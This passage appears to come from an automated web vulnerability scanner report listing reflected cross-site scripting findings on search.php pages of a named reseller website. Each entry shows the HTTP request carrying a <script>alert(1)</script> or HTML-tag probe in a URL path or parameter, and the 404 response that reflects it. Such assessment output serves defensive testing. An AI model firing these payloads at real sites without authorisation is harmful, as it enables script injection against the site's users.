Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband3e791<script>alert(1)</script>1cbf0215c78/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.540. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c86a8<script>alert(1)</script>e5aefa5e17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themesc86a8<script>alert(1)</script>e5aefa5e17/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themesc86a8<script>alert(1)</script>e5aefa5e17/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.541. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9351e<script>alert(1)</script>739e56ab0ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos9351e<script>alert(1)</script>739e56ab0ea/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos9351e<script>alert(1)</script>739e56ab0ea/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.542. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 65449<script>alert(1)</script>1aa6b59bfb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images65449<script>alert(1)</script>1aa6b59bfb6/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images65449<script>alert(1)</script>1aa6b59bfb6/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.543. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 31c43<script>alert(1)</script>e88632a01a3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review31c43<script>alert(1)</script>e88632a01a3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review31c43<script>alert(1)</script>e88632a01a3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.544. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 92c3b<script>alert(1)</script>e16088ae060 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php92c3b<script>alert(1)</script>e16088ae060?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php92c3b<script>alert(1)</script>e16088ae060?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.545. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2ce9a<a>7d0f221622e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search2ce9a<a>7d0f221622e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search2ce9a<a>7d0f221622e&opt=2 was not found on this server.</p>
...[SNIP]...

2.546. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eec90<a>b63d7dd58ce was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...eec90<a>b63d7dd58ce&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...eec90<a>b63d7dd58ce&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.547. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 56852<script>alert(1)</script>b477afa29a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&56852<script>alert(1)</script>b477afa29a5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&56852<script>alert(1)</script>b477afa29a5=1 was not found on this server.</p>
...[SNIP]...

2.548. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3912d<a>b77d1f358fb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23912d<a>b77d1f358fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23912d<a>b77d1f358fb was not found on this server.</p>
...[SNIP]...

2.549. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cbe8c<script>alert(1)</script>8ae41186207 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationcbe8c<script>alert(1)</script>8ae41186207/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationcbe8c<script>alert(1)</script>8ae41186207/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.550. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ebdf<script>alert(1)</script>4ce37b0c168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband3ebdf<script>alert(1)</script>4ce37b0c168/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband3ebdf<script>alert(1)</script>4ce37b0c168/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.551. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f7ee<script>alert(1)</script>6d506e0b1fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes1f7ee<script>alert(1)</script>6d506e0b1fa/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes1f7ee<script>alert(1)</script>6d506e0b1fa/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.552. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35089<script>alert(1)</script>2dd7a9e14f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos35089<script>alert(1)</script>2dd7a9e14f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos35089<script>alert(1)</script>2dd7a9e14f/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.553. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ccc5b<script>alert(1)</script>b6a5986c3ae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesccc5b<script>alert(1)</script>b6a5986c3ae/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesccc5b<script>alert(1)</script>b6a5986c3ae/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.554. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e25fa<script>alert(1)</script>043c6692ac2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/search.phpe25fa<script>alert(1)</script>043c6692ac2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.phpe25fa<script>alert(1)</script>043c6692ac2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.555. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4edbb<a>a66039a92b1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4edbb<a>a66039a92b1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search4edbb<a>a66039a92b1&opt=2 was not found on this server.</p>
...[SNIP]...

2.556. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 91263<a>d45704d6846 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...91263<a>d45704d6846&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
